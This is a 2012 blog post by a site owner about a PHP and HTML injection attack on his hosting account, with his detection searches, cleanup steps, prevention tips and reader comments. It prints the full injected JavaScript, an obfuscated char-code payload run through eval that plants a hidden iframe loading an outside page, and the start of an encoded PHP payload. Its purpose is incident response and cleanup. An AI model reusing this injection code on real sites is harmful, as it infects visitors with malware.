Monday 2 April 2012

New PHP injection attack and also HTML injection

Just 2 years ago wrote an article about an attack to one of my websites which injected PHP code in the top of EACH php file. And i shared with you my cleaning process and some little scripts for this task.

Now, just yesterday i suffered a new attack a little different, but it inserted also injections on some of my files PHP and HTML. I'me happy for share here with you my case and my solution for help you perhaps.



== My script for help you

Yes, just like 2 years ago i would like to share with you an script for help in the detection & cleaning. Don't be wrong, hehehe... it's a simple "search" script. But you will see that it will help you a lot.

Perhaps, with a bit of luck, some of you will make an improvement in the script and upload it, and i promise to update it here for download. Really, i use this script frequently for my developing work, so i'm improving it constantly. Include, i thinked about to create an opensoruce project around it... but well.. finally i never get the necesary time :(

Here you can download SRR_search.zip (SRR, from Sergi Rodrigues Rius :P)



Edited 2012-08-16: finally i start to use GitHub for share with others my scripts, and i began sharing my php_srrFileManager where i included the SRR_search.php functions. The difference is that now, with the php_srrFileManager we have a "nice" interface for browse files, delete, move, create, rename and SEARCH, in a way more friendly. This opensource project is encapsuled in a unique PHP file, so it continue being very easy to use ;)

Note: i didn't modified the original article (below) for use this new php_srrFileManager, but i think that it not will be very much difficult to imagine it. But if you have doubts, please add a comment and i will answer as soon as possible.



== Symptoms and detection of injection

I had the luck of be alerted today by email from my hosting provider. From here, many many many thanks Christine by your effort and help!!! They are VerveHosting, and guys... really they are very good, specially in the support to their customers. Excellent and very recommendable service! Eg. in this case i'm alive still thanks to them! ;)

Apart of this, i unknow how to detect automatically this kind of intrusions. The VerveHosting team simply were alerted by monitoring the FTP log!! where you can see something like this:

15:57:46 servera585 lfd: *Suspicious Process* PID:10658 User:myuser Uptime:116 secs EXE:/usr/sbin/pure-ftpd\00]\00frm\00cgi515.sem (deleted) CMD:pure-ftpd (UPLOAD)

After detect this entry at FTP log we look for the geolocalization of the IP of this connection and effectively was in another continent (Europe) than me (America). So it proof definetively that was an intruder... apart from the fact that the files downloaded and uploaded at my server i didn't touch never since the first day that i put on server.

Perhaps is interesting also note some things of this attack:

  • the attacker upload some file, and after delete it!! probably he/she upload it, then try to execute it calling it from outside the server (probably using curl), and after delete it FOR NOT LEAVE SIGNALS of the intrusion!! I say this because if we look at an inffected site we won't find any new file.
  • i don't know if before of after the FTP connection, but they injected a PHP code encrypted and decrypted with

    echo(gzinflate(base64_decode("tVVN...

    just at the end of the files which file name end with index.php, so for example they inffected my files like admin_index.php. So, briefly, for know if you hav been inffected could open this files and see if are inffected at the bottom of the file, just before the ?>.
  • also i don't know when they inffected my index.htm files -i supose that in the same moment the inffected the PHP of the previous point. In this case, the injection is of Javascript code JUST after the body tag:
1  
2  
<body><!--d93065-->
3  <
script>
4       
c=2;i=c-2;
5       if(
parseInt("0123")===83)
6       if(
window.document)try{
7            new 
String("asd").prototype.q
8       
}catch(egewgsd){
9            
f=['
10  -30i-30i66i63i-7i1i61i72i60i78i70i62i71i77i
11  7i64i62i77i30i69i62i70i62i71i77i76i27i82i45i
12  58i64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i
13  54i2i84i-26i-30i-30i-30i66i63i75i58i70i62i75
14  i1i2i20i-26i-30i-30i86i-7i62i69i76i62i-7i84i
15  -26i-30i-30i-30i61i72i60i78i70i62i71i77i7i80
16  i75i66i77i62i1i-5i21i66i63i75i58i70i62i-7i76
17  i75i60i22i0i65i77i77i73i19i8i8i78i71i80i72i
18  80i73i78i7i62i78i8i60i72i78i71i77i12i7i73i65
19  i73i0i-7i80i66i61i77i65i22i0i10i9i0i-7i65i62
20  i66i64i65i77i22i0i10i9i0i-7i76i77i82i69i62i
21  22i0i79i66i76i66i59i66i69i66i77i82i19i65i66i
22  61i61i62i71i20i73i72i76i66i77i66i72i71i19i
23  58i59i76i72i69i78i77i62i20i69i62i63i77i19i9i
24  20i77i72i73i19i9i20i0i23i21i8i66i63i75i58i70
25  i62i23i-5i2i20i-26i-30i-30i86i-26i-30i-30i63
26  i78i71i60i77i66i72i71i-7i66i63i75i58i70i62i
27  75i1i2i84i-26i-30i-30i-30i79i58i75i-7i63i-7i
28  22i-7i61i72i60i78i70i62i71i77i7i60i75i62i58i
29  77i62i30i69i62i70i62i71i77i1i0i66i63i75i58i7
30  0i62i0i2i20i63i7i76i62i77i26i77i77i75i66i59i
31  78i77i62i1i0i76i75i60i0i5i0i65i77i77i73i19i8
32  i8i78i71i80i72i80i73i78i7i62i78i8i60i72i78i
33  71i77i12i7i73i65i73i0i2i20i63i7i76i77i82i69i
34  62i7i79i66i76i66i59i66i69i66i77i82i22i0i65i
35  66i61i61i62i71i0i20i63i7i76i77i82i69i62i7i73
36  i72i76i66i77i66i72i71i22i0i58i59i76i72i69i78
37  i77i62i0i20i63i7i76i77i82i69i62i7i69i62i63i
38  77i22i0i9i0i20i63i7i76i77i82i69i62i7i77i72i
39  73i22i0i9i0i20i63i7i76i62i77i26i77i77i75i66i
40  59i78i77i62i1i0i80i66i61i77i65i0i5i0i10i9i0i
41  2i20i63i7i76i62i77i26i77i77i75i66i59i78i77i
42  62i1i0i65i62i66i64i65i77i0i5i0i10i9i0i2i20i
43  -26i-30i-30i-30i61i72i60i78i70i62i71i77i7i64
44  i62i77i30i69i62i70i62i71i77i76i27i82i45i58i
45  64i39i58i70i62i1i0i59i72i61i82i0i2i52i9i54i7
46  i58i73i73i62i71i61i28i65i66i69i61i1i63i2i20i
47  -26i-30i-30i86'
][0].split('i');
48            
md='a';
49            
v="ev"+"al";
50       }
51       if(
v)e=window[v];
52       
w=f;s=[];r=String;
53       for(;
565!=i;i+=1){
54            
j=i;
55            
s+=r["fromC"+"harCode"](39+1*w[j]);
56       }
57       if(
f)z=s;
58       
e(z);
59  
</script>
60  
<!--/d93065-->
61  



== Cleaning

  1. Well, perhaps the first action that you must take is to change your passwords on this site, specially for FTP and SSH if you have activated the Shell Access for this hosting account.
  2. The next is to remove the injections in your PHP and HTML files!

For this, i used the script SRR_search.php that you can download above. In any case you will need at least find ONE inffected file for take its "token" and search trhough all your filesystem!

  • in the case of the PHP injections we will search:

    SRR_search.php?q=gzinflate

    although this search can return "falses positives", because you can have other files than use this php function without be inffected ;) so another search that must complement the first is this:

    SRR_search.php?q=93065

    where precisely 93065 is the "token" present at the begining of all the injections. I suspect that the attacker use a different token for each inffected site for store infor about us in his "database" .... gggggrrrrrrr

  • in the case of the HTML/javascript injections we will search:

    SRR_search.php?q=egewgsd

    because the javascript injection code has this piece: }catch(egewgsd){ although in each attacked website this code is diferent.


With these searcher you will find the files injected, and because they are only a few (the ones ended with index.php or index.htm) then you can access via FTP and extract the injection mannually ;)

I would like that my script for searching could accept symbols not alphanumeric like parenthesis or braquets, but... this signs are difficult to write as a GET variable in the URL :(( but if you are able to modify to script for show a box and accept this query string by POST... it will be wellcomed if you upload and share your improvement! ;) i konw that it's not so complicated but... sincerely... mostly of times the script is useful anyway.



== Preventive measures

  • I've read that perhaps the problem is a bug in FileZilla. As you may know, the login connection data is stored in a plain text without encryption!!!! i unknow if that is really a serious security hole... if it was so, i don't think that the FileZilla programmer hasn't take none contra-measure.
  • I've read also about a trojan virus which inffected in this same way and once inffected one website, the next visitants to the website suffer a "browser inffection" and then th attacker can read login data for other clean sites... obviously for inffect them after! well... sincerely i didn't read very much about this yet. If you have good info from your own experience, please comment here.
  • Anyway, the best we can do is change all the passwords of the sites we have cleaned (specially FTP & SSH passwords).


Final note: remember to remove the SRR_search.php file for avoid onlookers ;) Although for a better security, i put at the top of the script a checking of the IP of the call:

//if (!substr($_SERVER['REMOTE_ADDR'],0,7)=='189.170'){echo "Sorry, your IP is not authorizated.";return;}

but i commented this line, so in fact it don't take effect if you not uncomment it.

4 comments:

  1. Hello Sergi

    How lucky find this blog today

    Just yesterday i have suffered the same attack
    and a heart-attack (jaja)

    I´ll execute your script and follow your instructions, also I`ll put in contact with
    me hosting provider.

    Any more information about origin or finding the
    malware will be very appreciated

    Thanks and regards.

    Javi
    Bilbao.

    ReplyDelete
  2. Gracias por tu aporte... en el último mes he tenido éste ataque en unos 30 sitios de 50 que manejo, he seguido un proceso similar al tuyo pero de manera manual buscando con DreamWeaver en cada archivo. Si alguien tiene información sobre el origen y como prevenirlo... sería muy interesante. Muchas gracias por el aporte.

    Fast translate: Thanks for your input ... in the last month I have had this attack in 30 of 50 sites I manage, I followed a process similar to yours but with DreamWeaver manually looking at each file. If anyone has information on the origin and how to prevent ... would be very interesting. Thank you very much for the contribution.

    ReplyDelete
  3. Hi

    Same problem has come up on several of our sites.
    Don't know how though.

    Interesting you mention Filezilla - I do have logins for all those sites there... hmmm...

    ReplyDelete
  4. Its like you read my mind! You seem to know so much about this, like you
    wrote the book in it or something. I think that you can do with some
    pics to drive the message home a bit, but instead of that, this is excellent blog.

    A fantastic read. I'll certainly be back.
    Also see my page :: amphora pipe tobacco

    ReplyDelete